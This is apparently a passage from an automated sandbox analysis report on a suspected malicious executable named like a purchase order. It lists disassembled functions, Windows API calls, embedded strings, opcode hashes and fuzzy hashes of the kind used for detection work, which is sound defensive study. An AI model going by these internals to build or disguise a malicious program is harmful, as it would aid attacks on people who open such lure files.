                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                  • String ID:
                                                                  • API String ID: 461458858-0
                                                                  • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                  • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                  • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                  • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                  Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                  • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                  • DeleteObject.GDI32(?), ref: 004301D0
                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3969911579-0
                                                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                  Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                  • String ID: 0
                                                                  • API String ID: 956284711-4108050209
                                                                  • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                  • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                  • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                  • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                  Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 1965227024-3771769585
                                                                  • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                  • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                  Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$_memmove_wcslen
                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                  • API String ID: 369157077-1007645807
                                                                  • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                  • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                  • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                  • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                  Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32 ref: 00445BF8
                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                  • __wcsicoll.LIBCMT ref: 00445C33
                                                                  • __wcsicoll.LIBCMT ref: 00445C4F
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 3125838495-3381328864
                                                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                  Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CharNext
                                                                  • String ID:
                                                                  • API String ID: 1350042424-0
                                                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                  Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                  • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                  • _wcscpy.LIBCMT ref: 004787E5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                  • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 3052893215-2127371420
                                                                  • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                  • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                  • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                  • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                  Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                  • __swprintf.LIBCMT ref: 0045E7F7
                                                                  • _wprintf.LIBCMT ref: 0045E8B3
                                                                  • _wprintf.LIBCMT ref: 0045E8D7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2295938435-2354261254
                                                                  • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                  • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                  Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                  • String ID: %.15g$0x%p$False$True
                                                                  • API String ID: 3038501623-2263619337
                                                                  • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                  • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                  • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                  • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                  Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                  • __swprintf.LIBCMT ref: 0045E5F6
                                                                  • _wprintf.LIBCMT ref: 0045E6A3
                                                                  • _wprintf.LIBCMT ref: 0045E6C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2295938435-8599901
                                                                  • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                  • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                  Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 00443B67
                                                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                  • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                  • IsWindow.USER32(?), ref: 00443C3A
                                                                  • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                  • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                  • String ID: BUTTON
                                                                  • API String ID: 1834419854-3405671355
                                                                  • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                  • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                  • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                  • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                  Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                  • LoadStringW.USER32(00000000), ref: 00454040
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • _wprintf.LIBCMT ref: 00454074
                                                                  • __swprintf.LIBCMT ref: 004540A3
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                  • API String ID: 455036304-4153970271
                                                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
